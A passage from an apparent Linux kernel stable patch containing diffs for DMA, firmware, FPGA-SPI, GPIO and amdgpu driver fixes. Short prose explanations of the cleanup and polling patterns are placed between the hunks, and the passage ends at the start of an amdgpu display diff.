+ 		return NULL;
+ 
+-	desc->in_use = true;
+ 	desc->dirn = DMA_MEM_TO_MEM;
+ 	desc->async_tx = vchan_tx_prep(&chan->vchan, &desc->vdesc, flags);
+ 
+@@ -290,7 +289,7 @@ static void sf_pdma_free_desc(struct virt_dma_desc *vdesc)
+ 	struct sf_pdma_desc *desc;
+ 
+ 	desc = to_sf_pdma_desc(vdesc);
+-	desc->in_use = false;
++	kfree(desc);
+ }
+ 
+ static void sf_pdma_donebh_tasklet(struct tasklet_struct *t)
+diff --git a/drivers/dma/sf-pdma/sf-pdma.h b/drivers/dma/sf-pdma/sf-pdma.h
+index dcb3687bd5da2..5c398a83b491a 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.h
++++ b/drivers/dma/sf-pdma/sf-pdma.h
+@@ -78,7 +78,6 @@ struct sf_pdma_desc {
+ 	u64				src_addr;
+ 	struct virt_dma_desc		vdesc;
+ 	struct sf_pdma_chan		*chan;
+-	bool				in_use;
+ 	enum dma_transfer_direction	dirn;
+ 	struct dma_async_tx_descriptor *async_tx;
+ };
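
With the in_use flag gone from sf_pdma_desc, descriptor lifetime is owned entirely by the virt-dma core: once the core drops its last reference it invokes the driver's desc_free callback, which is now the single release point. The whole callback reduces to:

    static void sf_pdma_free_desc(struct virt_dma_desc *vdesc)
    {
        kfree(to_sf_pdma_desc(vdesc));  /* core guarantees no further users */
    }
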
+diff --git a/drivers/firmware/dmi-sysfs.c b/drivers/firmware/dmi-sysfs.c
+index 66727ad3361b9..402217c570333 100644
+--- a/drivers/firmware/dmi-sysfs.c
++++ b/drivers/firmware/dmi-sysfs.c
+@@ -603,16 +603,16 @@ static void __init dmi_sysfs_register_handle(const struct dmi_header *dh,
+ 	*ret = kobject_init_and_add(&entry->kobj, &dmi_sysfs_entry_ktype, NULL,
+ 				    "%d-%d", dh->type, entry->instance);
+ 
+-	if (*ret) {
+-		kobject_put(&entry->kobj);
+-		return;
+-	}
+-
+ 	/* Thread on the global list for cleanup */
+ 	spin_lock(&entry_list_lock);
+ 	list_add_tail(&entry->list, &entry_list);
+ 	spin_unlock(&entry_list_lock);
+ 
++	if (*ret) {
++		kobject_put(&entry->kobj);
++		return;
++	}
++
+ 	/* Handle specializations by type */
+ 	switch (dh->type) {
+ 	case DMI_ENTRY_SYSTEM_EVENT_LOG:
+diff --git a/drivers/firmware/google/framebuffer-coreboot.c b/drivers/firmware/google/framebuffer-coreboot.c
+index c6dcc1ef93acf..c323a818805cc 100644
+--- a/drivers/firmware/google/framebuffer-coreboot.c
++++ b/drivers/firmware/google/framebuffer-coreboot.c
+@@ -43,9 +43,7 @@ static int framebuffer_probe(struct coreboot_device *dev)
+ 		    fb->green_mask_pos     == formats[i].green.offset &&
+ 		    fb->green_mask_size    == formats[i].green.length &&
+ 		    fb->blue_mask_pos      == formats[i].blue.offset &&
+-		    fb->blue_mask_size     == formats[i].blue.length &&
+-		    fb->reserved_mask_pos  == formats[i].transp.offset &&
+-		    fb->reserved_mask_size == formats[i].transp.length)
++		    fb->blue_mask_size     == formats[i].blue.length)
+ 			pdata.format = formats[i].name;
+ 	}
+ 	if (!pdata.format)
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index 447ee4ea5c903..f78249fe2512a 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -108,9 +108,10 @@ bool psci_power_state_is_valid(u32 state)
+ 	return !(state & ~valid_mask);
+ }
+ 
+-static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_hvc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
+@@ -118,9 +119,10 @@ static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_smc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
+@@ -128,7 +130,7 @@ static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static int psci_to_linux_errno(int errno)
++static __always_inline int psci_to_linux_errno(int errno)
+ {
+ 	switch (errno) {
+ 	case PSCI_RET_SUCCESS:
+@@ -169,7 +171,8 @@ int psci_set_osi_mode(bool enable)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
++static __always_inline int
++__psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ {
+ 	int err;
+ 
+@@ -177,13 +180,15 @@ static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(psci_0_1_function_ids.cpu_suspend,
+ 				  state, entry_point);
+ }
+ 
+-static int psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(PSCI_FN_NATIVE(0_2, CPU_SUSPEND),
+ 				  state, entry_point);
+@@ -450,10 +455,12 @@ late_initcall(psci_debugfs_init)
+ #endif
+ 
+ #ifdef CONFIG_CPU_IDLE
+-static int psci_suspend_finisher(unsigned long state)
++static noinstr int psci_suspend_finisher(unsigned long state)
+ {
+ 	u32 power_state = state;
+-	phys_addr_t pa_cpu_resume = __pa_symbol(cpu_resume);
++	phys_addr_t pa_cpu_resume;
++
++	pa_cpu_resume = __pa_symbol_nodebug((unsigned long)cpu_resume);
+ 
+ 	return psci_ops.cpu_suspend(power_state, pa_cpu_resume);
+ }
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index b4081f4d88a37..bde1f543f5298 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1138,13 +1138,17 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
+-	if (!controller)
+-		return -ENOMEM;
++	if (!controller) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	chans = devm_kmalloc_array(dev, SVC_NUM_CHANNEL,
+ 				   sizeof(*chans), GFP_KERNEL | __GFP_ZERO);
+-	if (!chans)
+-		return -ENOMEM;
++	if (!chans) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	controller->dev = dev;
+ 	controller->num_chans = SVC_NUM_CHANNEL;
+@@ -1159,7 +1163,7 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = kfifo_alloc(&controller->svc_fifo, fifo_size, GFP_KERNEL);
+ 	if (ret) {
+ 		dev_err(dev, "failed to allocate FIFO\n");
+-		return ret;
++		goto err_destroy_pool;
+ 	}
+ 	spin_lock_init(&controller->svc_fifo_lock);
+ 
+@@ -1198,19 +1202,20 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = platform_device_add(svc->stratix10_svc_rsu);
+ 	if (ret) {
+ 		platform_device_put(svc->stratix10_svc_rsu);
+-		return ret;
++		goto err_free_kfifo;
+ 	}
+ 
+ 	svc->intel_svc_fcs = platform_device_alloc(INTEL_FCS, 1);
+ 	if (!svc->intel_svc_fcs) {
+ 		dev_err(dev, "failed to allocate %s device\n", INTEL_FCS);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	ret = platform_device_add(svc->intel_svc_fcs);
+ 	if (ret) {
+ 		platform_device_put(svc->intel_svc_fcs);
+-		return ret;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	dev_set_drvdata(dev, svc);
+@@ -1219,8 +1224,12 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	return 0;
+ 
++err_unregister_dev:
++	platform_device_unregister(svc->stratix10_svc_rsu);
+ err_free_kfifo:
+ 	kfifo_free(&controller->svc_fifo);
++err_destroy_pool:
++	gen_pool_destroy(genpool);
+ 	return ret;
+ }
+ 
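
The stratix10-svc hunks convert every mid-probe failure to a goto ladder so resources unwind in reverse order of acquisition; the new err_destroy_pool and err_unregister_dev labels release the gen_pool and the already-registered child device that the earlier bare returns leaked. The canonical shape (illustrative names):

    ret = acquire_a(dev);
    if (ret)
        return ret;

    ret = acquire_b(dev);
    if (ret)
        goto err_release_a;

    return 0;

err_release_a:
    release_a(dev);
    return ret;
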
+diff --git a/drivers/fpga/microchip-spi.c b/drivers/fpga/microchip-spi.c
+index 7436976ea9048..137fafdf57a6f 100644
+--- a/drivers/fpga/microchip-spi.c
++++ b/drivers/fpga/microchip-spi.c
+@@ -6,6 +6,7 @@
+ #include <asm/unaligned.h>
+ #include <linux/delay.h>
+ #include <linux/fpga/fpga-mgr.h>
++#include <linux/iopoll.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+ #include <linux/spi/spi.h>
+@@ -33,7 +34,7 @@
+ 
+ #define	MPF_BITS_PER_COMPONENT_SIZE	22
+ 
+-#define	MPF_STATUS_POLL_RETRIES		10000
++#define	MPF_STATUS_POLL_TIMEOUT		(2 * USEC_PER_SEC)
+ #define	MPF_STATUS_BUSY			BIT(0)
+ #define	MPF_STATUS_READY		BIT(1)
+ #define	MPF_STATUS_SPI_VIOLATION	BIT(2)
+@@ -42,46 +43,55 @@
+ struct mpf_priv {
+ 	struct spi_device *spi;
+ 	bool program_mode;
++	u8 tx __aligned(ARCH_KMALLOC_MINALIGN);
++	u8 rx;
+ };
+ 
+-static int mpf_read_status(struct spi_device *spi)
++static int mpf_read_status(struct mpf_priv *priv)
+ {
+-	u8 status = 0, status_command = MPF_SPI_READ_STATUS;
+-	struct spi_transfer xfers[2] = { 0 };
+-	int ret;
+-
+ 	/*
+ 	 * HW status is returned on MISO in the first byte after CS went
+ 	 * active. However, first reading can be inadequate, so we submit
+ 	 * two identical SPI transfers and use result of the later one.
+ 	 */
+-	xfers[0].tx_buf = &status_command;
+-	xfers[1].tx_buf = &status_command;
+-	xfers[0].rx_buf = &status;
+-	xfers[1].rx_buf = &status;
+-	xfers[0].len = 1;
+-	xfers[1].len = 1;
+-	xfers[0].cs_change = 1;
++	struct spi_transfer xfers[2] = {
++		{
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++			.cs_change = 1,
++		}, {
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++		},
++	};
++	u8 status;
++	int ret;
+ 
+-	ret = spi_sync_transfer(spi, xfers, 2);
++	priv->tx = MPF_SPI_READ_STATUS;
++
++	ret = spi_sync_transfer(priv->spi, xfers, 2);
++	if (ret)
++		return ret;
++
++	status = priv->rx;
+ 
+ 	if ((status & MPF_STATUS_SPI_VIOLATION) ||
+ 	    (status & MPF_STATUS_SPI_ERROR))
+-		ret = -EIO;
++		return -EIO;
+ 
+-	return ret ? : status;
++	return status;
+ }
+ 
+ static enum fpga_mgr_states mpf_ops_state(struct fpga_manager *mgr)
+ {
+ 	struct mpf_priv *priv = mgr->priv;
+-	struct spi_device *spi;
+ 	bool program_mode;
+ 	int status;
+ 
+-	spi = priv->spi;
+ 	program_mode = priv->program_mode;
+-	status = mpf_read_status(spi);
++	status = mpf_read_status(priv);
+ 
+ 	if (!program_mode && !status)
+ 		return FPGA_MGR_STATE_OPERATING;
+@@ -185,52 +195,53 @@ static int mpf_ops_parse_header(struct fpga_manager *mgr,
+ 	return 0;
+ }
+ 
+-/* Poll HW status until busy bit is cleared and mask bits are set. */
+-static int mpf_poll_status(struct spi_device *spi, u8 mask)
++static int mpf_poll_status(struct mpf_priv *priv, u8 mask)
+ {
+-	int status, retries = MPF_STATUS_POLL_RETRIES;
++	int ret, status;
+ 
+-	while (retries--) {
+-		status = mpf_read_status(spi);
+-		if (status < 0)
+-			return status;
+-
+-		if (status & MPF_STATUS_BUSY)
+-			continue;
+-
+-		if (!mask || (status & mask))
+-			return status;
+-	}
++	/*
++	 * Busy poll HW status. Polling stops if any of the following
++	 * conditions are met:
++	 *  - timeout is reached
++	 *  - mpf_read_status() returns an error
++	 *  - busy bit is cleared AND mask bits are set
++	 */
++	ret = read_poll_timeout(mpf_read_status, status,
++				(status < 0) ||
++				((status & (MPF_STATUS_BUSY | mask)) == mask),
++				0, MPF_STATUS_POLL_TIMEOUT, false, priv);
++	if (ret < 0)
++		return ret;
+ 
+-	return -EBUSY;
++	return status;
+ }
+ 
+-static int mpf_spi_write(struct spi_device *spi, const void *buf, size_t buf_size)
++static int mpf_spi_write(struct mpf_priv *priv, const void *buf, size_t buf_size)
+ {
+-	int status = mpf_poll_status(spi, 0);
++	int status = mpf_poll_status(priv, 0);
+ 
+ 	if (status < 0)
+ 		return status;
+ 
+-	return spi_write(spi, buf, buf_size);
++	return spi_write_then_read(priv->spi, buf, buf_size, NULL, 0);
+ }
+ 
+-static int mpf_spi_write_then_read(struct spi_device *spi,
++static int mpf_spi_write_then_read(struct mpf_priv *priv,
+ 				   const void *txbuf, size_t txbuf_size,
+ 				   void *rxbuf, size_t rxbuf_size)
+ {
+ 	const u8 read_command[] = { MPF_SPI_READ_DATA };
+ 	int ret;
+ 
+-	ret = mpf_spi_write(spi, txbuf, txbuf_size);
++	ret = mpf_spi_write(priv, txbuf, txbuf_size);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = mpf_poll_status(spi, MPF_STATUS_READY);
++	ret = mpf_poll_status(priv, MPF_STATUS_READY);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return spi_write_then_read(spi, read_command, sizeof(read_command),
++	return spi_write_then_read(priv->spi, read_command, sizeof(read_command),
+ 				   rxbuf, rxbuf_size);
+ }
+ 
+@@ -242,7 +253,6 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 	const u8 isc_en_command[] = { MPF_SPI_ISC_ENABLE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	u32 isc_ret = 0;
+ 	int ret;
+ 
+@@ -251,9 +261,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write_then_read(spi, isc_en_command, sizeof(isc_en_command),
++	ret = mpf_spi_write_then_read(priv, isc_en_command, sizeof(isc_en_command),
+ 				      &isc_ret, sizeof(isc_ret));
+ 	if (ret || isc_ret) {
+ 		dev_err(dev, "Failed to enable ISC: spi_ret %d, isc_ret %u\n",
+@@ -261,7 +269,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EFAULT;
+ 	}
+ 
+-	ret = mpf_spi_write(spi, program_mode, sizeof(program_mode));
++	ret = mpf_spi_write(priv, program_mode, sizeof(program_mode));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to enter program mode: %d\n", ret);
+ 		return ret;
+@@ -274,11 +282,9 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 
+ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count)
+ {
+-	u8 spi_frame_command[] = { MPF_SPI_FRAME };
+ 	struct spi_transfer xfers[2] = { 0 };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret, i;
+ 
+ 	if (count % MPF_SPI_FRAME_SIZE) {
+@@ -287,18 +293,18 @@ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count
+ 		return -EINVAL;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	xfers[0].tx_buf = spi_frame_command;
+-	xfers[0].len = sizeof(spi_frame_command);
++	xfers[0].tx_buf = &priv->tx;
++	xfers[0].len = 1;
+ 
+ 	for (i = 0; i < count / MPF_SPI_FRAME_SIZE; i++) {
+ 		xfers[1].tx_buf = buf + i * MPF_SPI_FRAME_SIZE;
+ 		xfers[1].len = MPF_SPI_FRAME_SIZE;
+ 
+-		ret = mpf_poll_status(spi, 0);
+-		if (ret >= 0)
+-			ret = spi_sync_transfer(spi, xfers, ARRAY_SIZE(xfers));
++		ret = mpf_poll_status(priv, 0);
++		if (ret >= 0) {
++			priv->tx = MPF_SPI_FRAME;
++			ret = spi_sync_transfer(priv->spi, xfers, ARRAY_SIZE(xfers));
++		}
+ 
+ 		if (ret) {
+ 			dev_err(dev, "Failed to write bitstream frame %d/%zu\n",
+@@ -317,12 +323,9 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 	const u8 release_command[] = { MPF_SPI_RELEASE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret;
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write(spi, isc_dis_command, sizeof(isc_dis_command));
++	ret = mpf_spi_write(priv, isc_dis_command, sizeof(isc_dis_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to disable ISC: %d\n", ret);
+ 		return ret;
+@@ -330,7 +333,7 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 
+ 	usleep_range(1000, 2000);
+ 
+-	ret = mpf_spi_write(spi, release_command, sizeof(release_command));
++	ret = mpf_spi_write(priv, release_command, sizeof(release_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to exit program mode: %d\n", ret);
+ 		return ret;
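
The microchip-spi rework above replaces a hand-rolled retry counter with read_poll_timeout() from <linux/iopoll.h>, which re-invokes the accessor until the condition is true or the timeout expires, returning 0 on success and -ETIMEDOUT otherwise; a sleep interval of 0 makes it a busy-poll. It also moves the one-byte transfer buffers into driver state, since buffers handed to spi_sync_transfer() must be DMA-safe rather than on the stack. The call shape, as used in this patch:

    ret = read_poll_timeout(mpf_read_status, status,
                            (status < 0) ||
                            ((status & (MPF_STATUS_BUSY | mask)) == mask),
                            0, MPF_STATUS_POLL_TIMEOUT, false, priv);
    if (ret < 0)
        return ret;     /* -ETIMEDOUT: condition never became true */
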
+diff --git a/drivers/gpio/gpio-vf610.c b/drivers/gpio/gpio-vf610.c
+index 9db42f6a20439..a429176673e7a 100644
+--- a/drivers/gpio/gpio-vf610.c
++++ b/drivers/gpio/gpio-vf610.c
+@@ -304,7 +304,7 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 
+ 	gc = &port->gc;
+ 	gc->parent = dev;
+-	gc->label = "vf610-gpio";
++	gc->label = dev_name(dev);
+ 	gc->ngpio = VF610_GPIO_PER_PORT;
+ 	gc->base = of_alias_get_id(np, "gpio") * VF610_GPIO_PER_PORT;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index 30f145dc8724e..dbc842590b253 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -95,7 +95,7 @@ struct amdgpu_amdkfd_fence {
+ 
+ struct amdgpu_kfd_dev {
+ 	struct kfd_dev *dev;
+-	uint64_t vram_used;
++	int64_t vram_used;
+ 	uint64_t vram_used_aligned;
+ 	bool init_complete;
+ 	struct work_struct reset_work;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 404c839683b1c..da01c1424b4ad 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1653,6 +1653,7 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	struct amdgpu_bo *bo;
+ 	struct drm_gem_object *gobj = NULL;
+ 	u32 domain, alloc_domain;
++	uint64_t aligned_size;
+ 	u64 alloc_flags;
+ 	int ret;
+ 
+@@ -1703,22 +1704,23 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	 * the memory.
+ 	 */
+ 	if ((*mem)->aql_queue)
+-		size = size >> 1;
++		size >>= 1;
++	aligned_size = PAGE_ALIGN(size);
+ 
+ 	(*mem)->alloc_flags = flags;
+ 
+ 	amdgpu_sync_create(&(*mem)->sync);
+ 
+-	ret = amdgpu_amdkfd_reserve_mem_limit(adev, size, flags);
++	ret = amdgpu_amdkfd_reserve_mem_limit(adev, aligned_size, flags);
+ 	if (ret) {
+ 		pr_debug("Insufficient memory\n");
+ 		goto err_reserve_limit;
+ 	}
+ 
+ 	pr_debug("\tcreate BO VA 0x%llx size 0x%llx domain %s\n",
+-			va, size, domain_string(alloc_domain));
++			va, (*mem)->aql_queue ? size << 1 : size, domain_string(alloc_domain));
+ 
+-	ret = amdgpu_gem_object_create(adev, size, 1, alloc_domain, alloc_flags,
++	ret = amdgpu_gem_object_create(adev, aligned_size, 1, alloc_domain, alloc_flags,
+ 				       bo_type, NULL, &gobj);
+ 	if (ret) {
+ 		pr_debug("Failed to create BO on domain %s. ret %d\n",
+@@ -1775,7 +1777,7 @@ err_node_allow:
+ 	/* Don't unreserve system mem limit twice */
+ 	goto err_reserve_limit;
+ err_bo_create:
+-	amdgpu_amdkfd_unreserve_mem_limit(adev, size, flags);
++	amdgpu_amdkfd_unreserve_mem_limit(adev, aligned_size, flags);
+ err_reserve_limit:
+ 	mutex_destroy(&(*mem)->lock);
+ 	if (gobj)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index a21b3f66fd708..824b0b356b3ce 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4012,7 +4012,8 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ 
+ 	amdgpu_gart_dummy_page_fini(adev);
+ 
+-	amdgpu_device_unmap_mmio(adev);
++	if (drm_dev_is_unplugged(adev_to_drm(adev)))
++		amdgpu_device_unmap_mmio(adev);
+ 
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 2e5d78b6635c4..dfbeef2c4a9e2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2226,6 +2226,8 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 	struct drm_device *dev = pci_get_drvdata(pdev);
+ 	struct amdgpu_device *adev = drm_to_adev(dev);
+ 
++	drm_dev_unplug(dev);
++
+ 	if (adev->pm.rpm_mode != AMDGPU_RUNPM_NONE) {
+ 		pm_runtime_get_sync(dev->dev);
+ 		pm_runtime_forbid(dev->dev);
+@@ -2265,8 +2267,6 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 
+ 	amdgpu_driver_unload_kms(dev);
+ 
+-	drm_dev_unplug(dev);
+-
+ 	/*
+ 	 * Flush any in flight DMA operations from device.
+ 	 * Clear the Bus Master Enable bit and then wait on the PCIe Device
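
Moving drm_dev_unplug() to the top of amdgpu_pci_remove() marks the device unplugged before teardown starts, so concurrent ioctls bail out early instead of racing driver shutdown; correspondingly, the fini_hw hunk above now unmaps MMIO only when the device really is unplugged. Readers typically synchronize against unplug with the drm_dev_enter()/drm_dev_exit() pair:

    int idx;

    if (!drm_dev_enter(drm, &idx))
        return -ENODEV;     /* device already unplugged */
    /* ... safe to touch hardware here ... */
    drm_dev_exit(idx);
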
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 712dd72f3ccf2..087147f09933a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -354,7 +354,7 @@ static int psp_init_sriov_microcode(struct psp_context *psp)
+ 		adev->virt.autoload_ucode_id = AMDGPU_UCODE_ID_CP_MES1_DATA;
+ 		break;
+ 	default:
+-		BUG();
++		ret = -EINVAL;
+ 		break;
+ 	}
+ 	return ret;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+index 5e6ddc7e101c6..6cd6ea765d37f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+@@ -153,10 +153,10 @@ TRACE_EVENT(amdgpu_cs,
+ 
+ 	    TP_fast_assign(
+ 			   __entry->bo_list = p->bo_list;
+-			   __entry->ring = to_amdgpu_ring(job->base.sched)->idx;
++			   __entry->ring = to_amdgpu_ring(job->base.entity->rq->sched)->idx;
+ 			   __entry->dw = ib->length_dw;
+ 			   __entry->fences = amdgpu_fence_count_emitted(
+-				to_amdgpu_ring(job->base.sched));
++				to_amdgpu_ring(job->base.entity->rq->sched));
+ 			   ),
+ 	    TP_printk("bo_list=%p, ring=%u, dw=%u, fences=%u",
+ 		      __entry->bo_list, __entry->ring, __entry->dw,
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 31776b12e4c45..4b0d563c6522c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,6 +382,11 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index 6d291aa6386bd..f79b8e964140e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1127,8 +1127,13 @@ static int kfd_ioctl_alloc_memory_of_gpu(struct file *filep,
+ 	}
+ 
+ 	/* Update the VRAM usage count */
+-	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM)
+-		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + args->size);
++	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM) {
++		uint64_t size = args->size;
++
++		if (flags & KFD_IOC_ALLOC_MEM_FLAGS_AQL_QUEUE_MEM)
++			size >>= 1;
++		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + PAGE_ALIGN(size));
++	}
+ 
+ 	mutex_unlock(&p->mutex);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index a930b1873f2a4..050e7a52c8f62 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1240,7 +1240,7 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 	pa_config->gart_config.page_table_end_addr = page_table_end.quad_part << 12;
+ 	pa_config->gart_config.page_table_base_addr = page_table_base.quad_part;
+ 
+-	pa_config->is_hvm_enabled = 0;
++	pa_config->is_hvm_enabled = adev->mode_info.gpu_vm_support;
+ 
+ }
+ 
+@@ -2744,12 +2744,14 @@ static int dm_resume(void *handle)
+ 	drm_for_each_connector_iter(connector, &iter) {
+ 		aconnector = to_amdgpu_dm_connector(connector);
+ 
++		if (!aconnector->dc_link)
++			continue;
++
+ 		/*
+ 		 * this is the case when traversing through already created
+ 		 * MST connectors, should be skipped
+ 		 */
+-		if (aconnector->dc_link &&
+-		    aconnector->dc_link->type == dc_connection_mst_branch)
++		if (aconnector->dc_link->type == dc_connection_mst_branch)
+ 			continue;
+ 
+ 		mutex_lock(&aconnector->hpd_lock);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 64dd029702926..b87f50e8fa615 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
